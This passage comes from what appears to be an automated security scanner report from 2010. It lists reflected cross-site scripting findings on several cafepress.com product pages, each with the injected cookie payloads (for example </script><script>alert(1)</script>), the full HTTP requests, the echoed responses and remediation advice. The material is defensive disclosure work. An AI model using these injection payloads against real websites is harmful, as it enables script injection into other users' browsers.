__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=9b326</script><script>alert(1)</script>7b9d98d964e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 69636 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '9b326</script><script>alert(1)</script>7b9d98d964e ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-ipad-case
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db02"-alert(1)-"9bd63bb7d30 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 55461 Date: Sun, 26 Dec 2010 13:48:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-ipad-case
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc4d</script><script>alert(1)</script>d48aac4b022 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ccc4d</script><script>alert(1)</script>d48aac4b022 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 55481 Date: Sun, 26 Dec 2010 13:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55481 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'ccc4d</script><script>alert(1)</script>d48aac4b022 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51aff"-alert(1)-"90ad1b3827e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 57100 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57100 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c70c</script><script>alert(1)</script>36986f285d4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=3c70c</script><script>alert(1)</script>36986f285d4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 57121 Date: Sun, 26 Dec 2010 13:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57121 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '3c70c</script><script>alert(1)</script>36986f285d4 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46ce6"-alert(1)-"366e3ae2b93 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 53742 Date: Sun, 26 Dec 2010 13:48:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 53742 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
